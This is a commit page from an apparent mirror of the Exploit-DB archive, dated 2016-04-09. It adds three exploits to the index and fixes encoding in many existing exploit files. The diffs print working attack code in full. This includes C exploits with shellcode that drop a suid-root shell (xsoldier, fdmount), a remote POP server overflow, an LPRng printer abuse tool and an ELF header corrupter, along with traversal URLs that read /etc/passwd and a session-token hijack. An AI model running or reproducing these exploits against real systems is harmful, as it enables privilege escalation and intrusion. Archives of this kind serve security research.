bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-04-09

Browse source 
3 new exploits

WordPress Freshmail - Unauthenticated SQL Injection
WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection
Express Zip <= 2.40 - Path Traversal
Apple Intel HD 3000 Graphics driver 10.0.0 - Local Privilege Escalation
op5 7.1.9 - Remote Command Execution
This commit is contained in:
Offensive Security 2016-04-09 05:02:52 +00:00
parent dd626b05db
commit 1f79ff2236
47 changed files with 1473 additions and 667 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -33336,7 +33336,7 @@ id,file,description,date,author,platform,type,port
36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow Vulnerability",2012-03-08,"Julien Ahrens",windows,local,0
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
36930,platforms/multiple/webapps/36930.txt,"WordPress Freshmail - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
@ -35895,3 +35895,6 @@ id,file,description,date,author,platform,type,port
39671,platforms/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0
39672,platforms/hardware/webapps/39672.txt,"PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities",2016-04-07,Orwelllabs,hardware,webapps,443
39673,platforms/linux/local/39673.py,"Mess Emulator 0.154-3.1 - Local Buffer Overflow",2016-04-07,"Juan Sacco",linux,local,0
39674,platforms/windows/local/39674.py,"Express Zip <= 2.40 - Path Traversal",2016-04-08,R-73eN,windows,local,0
39675,platforms/osx/local/39675.c,"Apple Intel HD 3000 Graphics driver 10.0.0 - Local Privilege Escalation",2016-04-08,"Piotr Bania",osx,local,0
39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443

Can't render this file because it is too large.

2
platforms/cgi/webapps/21558.txt
View file

@ -4,4 +4,4 @@ My Postcards is a commercial available eletronic postcard system. It is availabl
The magiccard.cgi script does not properly handle some types of input. As a result, it may be possible for a remote user to specify the location of a specific file on the system hosting the My Postcards software. Upon specifying the location of a file that is readable by the web server process, the user could disclose the contents of the specified file.
http://www.example.com/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd
http://www.example.com/cgi-bin/magiccard.cgi?pa=preview&next=custom&page=../../../../../../../../../../etc/passwd

2
platforms/freebsd/local/19649.c
View file

@ -4,7 +4,7 @@ There is a buffer overflow vulnerability known to be present in the version of g
/*
* gdc exploit for Freebsd-3.3 yields euid=3D0(root)
* gdc exploit for Freebsd-3.3 yields euid=0(root)
* by default, only group wheel (or whatever your trusted gated group is)=
* and root can run gdc

90
platforms/freebsd/local/19676.c
View file

@ -6,71 +6,65 @@ The binary itself is subject to a buffer overflow attack (which may be launched
The user does not have to have a valid $DISPLAY to exploit this.
/* =
* xsoldier exploit for Freebsd-3.3-RELEASE
* Drops a suid root shell in /bin/sh
* Brock Tellier btellier@usa.net
*/
/*
* xsoldier exploit for Freebsd-3.3-RELEASE
* Drops a suid root shell in /bin/sh
* Brock Tellier btellier@usa.net
*/
#include <stdio.h>
char shell[]=3D /* mudge@l0pht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";
char shell[]= /* mudge@l0pht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";
#define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"
void buildui() {
FILE *fp;
char cc[100];
fp =3D fopen("/tmp/ui.c", "w");
fprintf(fp, CODE);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
system(cc);
char cc[100];
fp = fopen("/tmp/ui.c", "w");
fprintf(fp, CODE);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
system(cc);
}
main (int argc, char *argv[] ) {
int x =3D 0;
int y =3D 0;
int offset =3D 0;
int bsize =3D 4400;
char buf[bsize];
int eip =3D 0xbfbfdb65; /* works for me */
buildui();
int x = 0;
int y = 0;
int offset = 0;
int bsize = 4400;
char buf[bsize];
int eip = 0xbfbfdb65; /* works for me */
buildui();
if (argv[1]) { =
offset =3D atoi(argv[1]);
eip =3D eip + offset;
}
fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE
if (argv[1]) {
offset = atoi(argv[1]);
eip = eip + offset;
}
fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE
<btellier@usa.net>\n");
fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
fprintf(stderr, "eip=3D0x%x offset=3D%d buflen=3D%d\n", eip, offset, bsi=
ze);
=
fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
for ( x =3D 0; x < 4325; x++) buf[x] =3D 0x90;
fprintf(stderr, "NOPs to %d\n", x);
=
for ( x = 0; x < 4325; x++) buf[x] = 0x90;
fprintf(stderr, "NOPs to %d\n", x);
for ( y =3D 0; y < 67 ; x++, y++) buf[x] =3D shell[y];
fprintf(stderr, "Shellcode to %d\n",x);
=
for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
fprintf(stderr, "Shellcode to %d\n",x);
buf[x++] = eip & 0x000000ff;
buf[x++] = (eip & 0x0000ff00) >> 8;
buf[x++] = (eip & 0x00ff0000) >> 16;
buf[x++] = (eip & 0xff000000) >> 24;
fprintf(stderr, "eip to %d\n",x);
buf[x++] =3D eip & 0x000000ff;
buf[x++] =3D (eip & 0x0000ff00) >> 8;
buf[x++] =3D (eip & 0x00ff0000) >> 16;
buf[x++] =3D (eip & 0xff000000) >> 24;
fprintf(stderr, "eip to %d\n",x);
buf[bsize]=3D'\0';
buf[bsize]='\0';
execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);
}
}

99
platforms/hardware/remote/17507.py
View file

@ -1,4 +1,103 @@
#!/usr/bin/python
###############################################################################
#
#Title : Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability
#Author : Veerendra G.G from SecPod Technologies (www.secpod.com)
#Vendor : http://www.avaya.com/usa/product/ip-office
#Advisory : http://www.avaya.com/usa/product/ip-office
# http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
# http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
# http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt
#Version : Avaya IP Office Manager TFTP Server Version 8.1
#Date : 08/07/2011
#
################################################################################
#
#SecPod ID: 1017 25/05/2011 Issue Discovered
# 31/05/2011 Vendor Notified
# No Response from the Vendor
# 08/07/2011 Advisory Released
#
#
#Class: Information Disclosure Severity: Medium
#
#
#Overview:
#---------
#Avaya IP Office Manager TFTP Server Version 8.1 is prone to a Directory
#Traversal vulnerability.
#
#
#Technical Description:
#----------------------
#The vulnerability is caused due to improper validation to Read Request
#Parameter containing '../' sequences, which allows attackers to read
#arbitrary files via directory traversal attacks.
#
#
#Impact:
#--------
#Successful exploitation could allow an attacker to to obtain sensitive
#information, which can lead to launching further attacks.
#
#
#Affected Software:
#------------------
#Avaya IP Office Manager TFTP Server Version 8.1
#
#
#Tested on:
#-----------
#Avaya IP Office Manager TFTP Server Version 8.1 on Windows XP SP3.
#
#
#References:
#-----------
#http://secpod.org/blog/?p=225
#http://www.avaya.com/usa/product/ip-office
#http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
#http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
#http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt
#
#
#Proof of Concept:
#----------------
#http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
#http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
#
#
#Solution:
#----------
#Not available
#
#
#Risk Factor:
#-------------
# CVSS Score Report:
# ACCESS_VECTOR = NETWORK
# ACCESS_COMPLEXITY = LOW
# AUTHENTICATION = NOT_REQUIRED
# CONFIDENTIALITY_IMPACT = PARTIAL
# INTEGRITY_IMPACT = NONE
# AVAILABILITY_IMPACT = NONE
# EXPLOITABILITY = PROOF_OF_CONCEPT
# REMEDIATION_LEVEL = UNAVAILABLE
# REPORT_CONFIDENCE = CONFIRMED
# CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N)
# CVSS Temporal Score = 4.5
# Risk factor = Medium
#
#
#Credits:
#--------
#Veerendra G.G of SecPod Technologies has been credited with the discovery of
#this vulnerability.
#
#
#SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py:
#
##############################################################################
# Exploit : http://secpod.com/blog/?p=225
# http://secpod.org/Exploit-Avaya-IP-Manager-Dir-Trav.py

30
platforms/hardware/webapps/23250.txt
View file

@ -35,27 +35,27 @@ Length: unspecified [application/octet-stream Content-transfer-encoding: bi=
nary]
Saving to: =E2=80=9Cfilename.gwc=E2=80=9D
[ <=3D> ] 15,=
[ <=> ] 15,=
927 50.9K/s in 0.3s =20
2012-12-08 21:24:43 (50.9 KB/s) - =E2=80=9Cfilename.gwc=E2=80=9D saved [159=
27]
$ head -n 10 filename.gwc=20
CRCVALUE=3D4144540802;
CRCVALUE=4144540802;
#<<Begin of Configuration File>>
Version=3D1.1;
Created Date=3D2012/12/8;
Created Time=3D21:24:43;
Model Number=3DDPC2420;
Serial Number=3D234905123;
User Password=3Dky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw=
Version=1.1;
Created Date=2012/12/8;
Created Time=21:24:43;
Model Number=DPC2420;
Serial Number=234905123;
User Password=ky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw=
l0jX2glgaQuXx27Eo3FgAz5E1N7bk9yR
7hDbzGS+y7XY4jJjY5yin5SkqAQp9GJl/sZO4t4D7TJzy2oV43flEwmdIPkyJC74zTOYZhb24UL=
Jz3HV6ci5wn3gMPi0rSTkUc3pzHdiK
WMMAsuMrYBi5MU9yqZ1vhCfC/c2Is1xgU1Kq0Y1Wcn2LdmRFU6+7rjRuN6iisAQZRQcF/kiym5V=
ewYRBbnRNKjMXC0fw+M9y4V7Y8S4B6
3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg=3D=3D;
3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg==;
[---OUTPUT OMITTED FOR SPACE REASONS---]
[0x02]> - Persistent XSS
@ -94,12 +94,12 @@ lain text easily.=20
0x00b0: 300d 0a41 6363 6570 743a 2074 6578 742f 0..Accept:.text/
0x00c0: 6874 6d6c 2c61 7070 6c69 6361 7469 6f6e html,application
0x00d0: 2f78 6874 6d6c 2b78 6d6c 2c61 7070 6c69 /xhtml+xml,appli
0x00e0: 6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39 cation/xml;q=3D0.=
0x00e0: 6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39 cation/xml;q=0.=
9
0x00f0: 2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365 ,*/*;q=3D0.8..Acc=
0x00f0: 2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365 ,*/*;q=0.8..Acc=
e
0x0100: 7074 2d4c 616e 6775 6167 653a 2065 6e2d pt-Language:.en-
0x0110: 5553 2c65 6e3b 713d 302e 350d 0a41 6363 US,en;q=3D0.5..Ac=
0x0110: 5553 2c65 6e3b 713d 302e 350d 0a41 6363 US,en;q=0.5..Ac=
c
0x0120: 6570 742d 456e 636f 6469 6e67 3a20 677a ept-Encoding:.gz
0x0130: 6970 2c20 6465 666c 6174 650d 0a43 6f6e ip,.deflate..Con
@ -109,13 +109,13 @@ c
0x0170: 2f77 6562 7374 6172 2e68 746d 6c0d 0a41 /webstar.html..A
0x0180: 7574 686f 7269 7a61 7469 6f6e 3a20 4261 uthorization:.Ba
0x0190: 7369 6320 4f6b 4d30 626d fa38 3443 a9c0 sic.aWFtYXBhc3N3
0x01a0: 1b4e 1134 640a 054b ZAo=3D=3D....
0x01a0: 1b4e 1134 640a 054b ZAo==....
- From 0x0180 offset to the end of the packet payload the attacker could ge=
t the password=20
encoded with Base64 and simply convert it to plain text:
$ echo aWFtYXBhc3N3ZAo=3D=3D | base64 -d
$ echo aWFtYXBhc3N3ZAo== | base64 -d
iamapassword
- ---
@ -136,5 +136,5 @@ zf321LYlndkJuziYkjTjnJHtroaNh9I0jJMZhVFLJSTuAXmCp0OutPveWEvEX/h9
s6/7Iyi952A3YkqCEsy4q8JUaoxGLMvXeUZM71zVvwEeF8M/2BPziU/JleHMdXWq
X2XH8V94KuiILuFSeS+rtT5ILJDHyWL9uVc1wIWvl33jnhPqSCgPlWvwLuWHBf+G
E7C4vqJfmBNShPTbtb67
=3DEzto
=Ezto
-----END PGP SIGNATURE-----

10
platforms/linux/dos/22370.txt
View file

@ -8,14 +8,14 @@ From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y"
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=3D-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=3Dname
Content-Type: application/octet-stream; name=3Dname
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit
begin 600 phase2
@ -27,4 +27,4 @@ M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A-
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@
end
--=3D-mTDu5zdJIsixETTwCF5Y--
--=-mTDu5zdJIsixETTwCF5Y--

142
platforms/linux/local/19384.c
View file

@ -30,89 +30,89 @@ The LPRng software is an enhanced, extended, and portable version of the Berkele
int main(int argc, char **argv)
{
int sock;
struct sockaddr_in dest_sin;
struct sockaddr_in src_sin;
struct hostent *hp;
unsigned long ipnum;
char line[256];
int mode =3D 0;
int sock;
struct sockaddr_in dest_sin;
struct sockaddr_in src_sin;
struct hostent *hp;
unsigned long ipnum;
char line[256];
int mode = 0;
if (argc < 2)
{
fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]);
exit(EXIT_FAILURE);
}
if (argc < 2)
{
fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]);
exit(EXIT_FAILURE);
}
if (argc >=3D 3)
{
if (!strcmp(argv[2], "start"))
mode =3D 1;
else if (strcmp(argv[2], "stop"))
{
fprintf(stderr, "Invalid mode. Use stop or start.\n");
fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]);
exit(EXIT_FAILURE);
}
}
=09
snprintf(line, sizeof(line), "%c%s root %s %s\n",=20
6, argv[1], (mode)? "start":"stop", argv[1]);
if (argc >= 3)
{
if (!strcmp(argv[2], "start"))
mode = 1;
else if (strcmp(argv[2], "stop"))
{
fprintf(stderr, "Invalid mode. Use stop or start.\n");
fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]);
exit(EXIT_FAILURE);
}
}
=09
snprintf(line, sizeof(line), "%c%s root %s %s\n",=20
6, argv[1], (mode)? "start":"stop", argv[1]);
memset(&dest_sin, 0, sizeof(struct sockaddr_in));
dest_sin.sin_port =3D htons((short) DST_PORT);
memset(&dest_sin, 0, sizeof(struct sockaddr_in));
dest_sin.sin_port = htons((short) DST_PORT);
ipnum =3D (unsigned long) inet_addr(HOST);
if (ipnum !=3D ((unsigned long) INADDR_NONE))
{
dest_sin.sin_family =3D AF_INET;
dest_sin.sin_addr.s_addr =3D ipnum;
}
else
{
if ((hp =3D gethostbyname(HOST)) =3D=3D NULL)
{
fprintf(stderr, "Host lookup failed.\n");
exit(EXIT_FAILURE);
}
ipnum = (unsigned long) inet_addr(HOST);
if (ipnum != ((unsigned long) INADDR_NONE))
{
dest_sin.sin_family = AF_INET;
dest_sin.sin_addr.s_addr = ipnum;
}
else
{
if ((hp = gethostbyname(HOST)) == NULL)
{
fprintf(stderr, "Host lookup failed.\n");
exit(EXIT_FAILURE);
}
dest_sin.sin_family =3D hp->h_addrtype;
memcpy(&dest_sin.sin_addr.s_addr,hp->h_addr_list[0],
(size_t)hp->h_length);
}
dest_sin.sin_family = hp->h_addrtype;
memcpy(&dest_sin.sin_addr.s_addr,hp->h_addr_list[0],
(size_t)hp->h_length);
}
if ((sock =3D socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("Socket call failed");
exit(EXIT_FAILURE);
}
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("Socket call failed");
exit(EXIT_FAILURE);
}
src_sin.sin_family =3D AF_INET;
src_sin.sin_addr.s_addr =3D INADDR_ANY;
src_sin.sin_port =3D htons((u_short) SRC_PORT);
src_sin.sin_family = AF_INET;
src_sin.sin_addr.s_addr = INADDR_ANY;
src_sin.sin_port = htons((u_short) SRC_PORT);
if ((bind(sock, (struct sockaddr *)&src_sin, sizeof(src_sin))) < 0)
{
perror("Bind failed");
exit(EXIT_FAILURE);
}
if ((bind(sock, (struct sockaddr *)&src_sin, sizeof(src_sin))) < 0)
{
perror("Bind failed");
exit(EXIT_FAILURE);
}
if (connect(sock, (struct sockaddr *)&dest_sin, sizeof(dest_sin)) < 0)
{
close(sock);
perror("Connect failed");
exit(EXIT_FAILURE);
}
if (connect(sock, (struct sockaddr *)&dest_sin, sizeof(dest_sin)) < 0)
{
close(sock);
perror("Connect failed");
exit(EXIT_FAILURE);
}
if (write(sock, line, strlen(line)) <=3D 0)
{
perror("Write failed");
exit(EXIT_FAILURE);
}
if (write(sock, line, strlen(line)) <= 0)
{
perror("Write failed");
exit(EXIT_FAILURE);
}
close(sock);
close(sock);
return EXIT_SUCCESS;
return EXIT_SUCCESS;
}
---- stop lpcontrol.c -----------------------------------------------

30
platforms/linux/local/19953.c
View file

@ -51,7 +51,7 @@ box,
// Gee, Aleph1 his shellcode is back once more
char shellcode[] =3D
char shellcode[] =
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
@ -63,16 +63,16 @@ unsigned long get_sp(void) {
main(int argc, char **argv)
{
int buf_size =3D 71;
int offset=3D0, i;
int buf_size = 71;
int offset=0, i;
char *overflow;
char *ovoff;
long addr, ptr=3D0x0804c7d0;
long addr, ptr=0x0804c7d0;
if(argc>1) offset =3D atoi(argv[1]);
if(argc>2) buf_size =3D atoi(argv[2]);
if(argc>3) ptr =3D strtol(argv[3], (char **) NULL, 16);
if(argc>1) offset = atoi(argv[1]);
if(argc>2) buf_size = atoi(argv[2]);
if(argc>3) ptr = strtol(argv[3], (char **) NULL, 16);
printf("##############################################\n");
printf("# fdmount Slack 4/7 exploit - by Scrippie #\n");
@ -82,19 +82,19 @@ main(int argc, char **argv)
printf("Using 0x%x for \"void errmsg(char *text,...)\" char *text\n", =
ptr);
if(!(overflow =3D (char =
if(!(overflow = (char =
*)malloc(buf_size+16+NUM_NOPS+strlen(shellcode)))) {
fprintf(stderr, "Outta memory - barging out\n");
exit(-1);
}
overflow[0] =3D '/';
overflow[0] = '/';
for(i=3D1;i<buf_size;i++) {
overflow[i] =3D 0x90;
for(i=1;i<buf_size;i++) {
overflow[i] = 0x90;
}
addr =3D get_sp() - offset;
addr = get_sp() - offset;
printf("Resulting address: 0x%x\n", addr);
@ -103,10 +103,10 @@ ptr);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
ovoff =3D overflow + strlen(overflow);
ovoff = overflow + strlen(overflow);
for(i=3D0;i<NUM_NOPS;i++) {
*ovoff =3D 0x90;
for(i=0;i<NUM_NOPS;i++) {
*ovoff = 0x90;
*ovoff++;
}

34
platforms/linux/remote/19123.c
View file

@ -19,7 +19,7 @@ A buffer overflow exists in the pop server shipped with Santa Cruz Operation, In
#include <netdb.h>
#include <sys/errno.h>
char *shell=3D
char *shell=
"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
"\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7e"
"\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
@ -32,7 +32,7 @@ char *shell=3D
#define BUFLEN 1200
char buf[BUFLEN];
int offset=3DOFFSET;
int offset=OFFSET;
int nbytes;
int sock;
struct sockaddr_in sa;
@ -47,24 +47,24 @@ v2.1.4-R3\n");
exit(0);
}
if(argc>2)
offset=3Datoi(argv[2]);
offset=atoi(argv[2]);
memset(buf,0x90,BUFLEN);
memcpy(buf+800,shell,strlen(shell));
for(i=3D901;i<BUFLEN-4;i+=3D4)
*(int *)&buf[i]=3DADDR+offset;
buf[BUFLEN]=3D'\n';
if((hp=3D(struct hostent *)gethostbyname(argv[1]))=3D=3DNULL) {
for(i=901;i<BUFLEN-4;i+=4)
*(int *)&buf[i]=ADDR+offset;
buf[BUFLEN]='\n';
if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("gethostbyname()");
exit(0);
}
if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("socket()");
exit(0);
}
sa.sin_family=3DAF_INET;
sa.sin_port=3Dhtons(110);
sa.sin_family=AF_INET;
sa.sin_port=htons(110);
memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=3D0) {
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
perror("connect()");
exit(0);
}
@ -77,17 +77,17 @@ fflush(stdout);
FD_SET(0,&input);
FD_SET(sock,&input);
if((select(sock+1,&input,NULL,NULL,NULL))<0) {
if(errno=3D=3DEINTR) continue;
if(errno==EINTR) continue;
printf("CONNECTION CLOSED...\n"); =
fflush(stdout);
exit(1);
}
if(FD_ISSET(sock,&input)) {
nbytes=3Dread(sock,buf,BUFLEN);
for(i=3D0;i<nbytes;i++) {
*(char *)&a=3Dbuf[i];
if ((a!=3D10)&&((a >126) || (a<32)) ){
buf[i]=3D' ';
nbytes=read(sock,buf,BUFLEN);
for(i=0;i<nbytes;i++) {
*(char *)&a=buf[i];
if ((a!=10)&&((a >126) || (a<32)) ){
buf[i]=' ';
}
}
write(1,buf,nbytes);

32
platforms/multiple/dos/23524.c
View file

@ -34,8 +34,8 @@ nitr0us@burial:~$ gdb -q idaq
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to Thread 0xb6860760 (LWP 3638)]
0xb55f7694 in default_notification_handler (reader=3D@0xbfbffae0,
notif=3Dreader_t::err_shstrndx) at reader.cpp:33
0xb55f7694 in default_notification_handler (reader=@0xbfbffae0,
notif=reader_t::err_shstrndx) at reader.cpp:33
33 reader.cpp: No such file or directory.
in reader.cpp
Current language: auto; currently c++
@ -75,7 +75,7 @@ verify if e_shstrndx > e_shnum before referencing it.
#define ELFCLASS32 1 /* 32-bit objects */
#define ELFDATA2LSB 1 /* 2's complement, little endian */
const char e_magic[4] =3D { 0x7f, 'E', 'L', 'F' };
const char e_magic[4] = { 0x7f, 'E', 'L', 'F' };
typedef uint16_t Elf32_Half;
typedef uint32_t Elf32_Word;
@ -128,7 +128,7 @@ fprintf(stderr, "Usage: %s <elf_file_to_patch>\n", argv[0]);
exit(-1);
}
if((fd =3D open(argv[1], O_RDWR)) =3D=3D -1){
if((fd = open(argv[1], O_RDWR)) == -1){
perror("open");
exit(-1);
}
@ -139,8 +139,8 @@ exit(-1);
}
// Mapping to memory only the necessary bytes [sizeof(header)]
if((header =3D (Elf32_Ehdr *) mmap(NULL, sizeof(header), PROT_READ | PRO=
T_WRITE, MAP_SHARED, fd, 0)) =3D=3D MAP_FAILED){
if((header = (Elf32_Ehdr *) mmap(NULL, sizeof(header), PROT_READ | PRO=
T_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){
perror("mmap");
close(fd);
exit(-1);
@ -156,17 +156,17 @@ printf("[*] Patching \"%s\" with new random() values...\n\n", argv[1]);
srand(time(NULL)); // seed for rand()
new_shnum =3D (Elf32_Half) rand() % 0x1337;
new_shstrndx =3D (Elf32_Half) 0;
new_shnum = (Elf32_Half) rand() % 0x1337;
new_shstrndx = (Elf32_Half) 0;
while(new_shstrndx < new_shnum)
new_shstrndx =3D (Elf32_Half) rand() % 0xDEAD;
new_shstrndx = (Elf32_Half) rand() % 0xDEAD;
header->e_shnum =3D new_shnum;
header->e_shstrndx =3D new_shstrndx;
header->e_shnum = new_shnum;
header->e_shstrndx = new_shstrndx;
// Synchronize the ELF in file system with the previous memory mapped
if(msync(NULL, 0, MS_SYNC) =3D=3D -1){
if(msync(NULL, 0, MS_SYNC) == -1){
perror("msync");
close(fd);
exit(-1);
@ -189,25 +189,25 @@ int isELF(int fd)
{
Elf32_Ehdrheader;
if(read(fd, &header, sizeof(header)) =3D=3D -1){
if(read(fd, &header, sizeof(header)) == -1){
perror("isELF(): read");
return 0;
}
/* magic number verification */
if(memcmp(header.e_ident, e_magic, 4) !=3D 0){
if(memcmp(header.e_ident, e_magic, 4) != 0){
fprintf(stderr, "The argument given is not an ELF file !\n");
return 0;
}
/* 32-bit class verification */
if(header.e_ident[4] !=3D ELFCLASS32){
if(header.e_ident[4] != ELFCLASS32){
fprintf(stderr, "Only 32-bit ELF files supported !\n");
return 0;
}
/* little-endian verification */
if(header.e_ident[5] !=3D ELFDATA2LSB){
if(header.e_ident[5] != ELFDATA2LSB){
fprintf(stderr, "Only little-endian ELF files supported !\n");
return 0;
}

2
platforms/multiple/webapps/24744.txt
View file

@ -22,7 +22,7 @@ paths via Spring Security configuration or other means.
Example:
A request to:
/app/api/rpc/users/get?offset=3DOFFSET
/app/api/rpc/users/get?offset=OFFSET
will return the following:

6
platforms/multiple/webapps/31647.txt
View file

@ -12,13 +12,13 @@ Details:
CA 2E Web Option (r8.1.2) and potentially others, is vulnerable to unauthenticated privilege escalation via a predictable session token.
The POST parameter session token W2E_SSNID appears as follows:
W2E_SSNID=3DW90NIxGoSsN1023ZYW2E735182000013CLSpKfgkCJSLKsc600061JKenjKnE
W2E_SSNID=W90NIxGoSsN1023ZYW2E735182000013CLSpKfgkCJSLKsc600061JKenjKnE
JuNX9GoVjCEbqIuKh6kFRvbzYnUxgQtONszJldyAar3LtTSwsmBLpdlPc5iDH4Zf75
However, this token is poorly validated, leading to
W2E_SSNID=3DW90NIxGoSsN1023ZYW2E735182000013
W2E_SSNID=W90NIxGoSsN1023ZYW2E735182000013
being accepted as a valid session. By incrementing and
decrementing the digits at the end of the value given above, it is
@ -27,7 +27,7 @@ part of the login page, and as such, can be manipulated by an
unauthenticated attacker, giving them access to any valid session.
Consequentially, it is possible to access the following page as such:
https://app.domain.co.uk/web2edoc/close.htm?SSNID=3DW90NIxGoSsN1023ZYW2E735182000026
https://app.domain.co.uk/web2edoc/close.htm?SSNID=W90NIxGoSsN1023ZYW2E735182000026
Ending the session specified, which could lead to a denial of service condition.

20
platforms/multiple/webapps/36930.txt
View file

@ -3,7 +3,7 @@
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/>
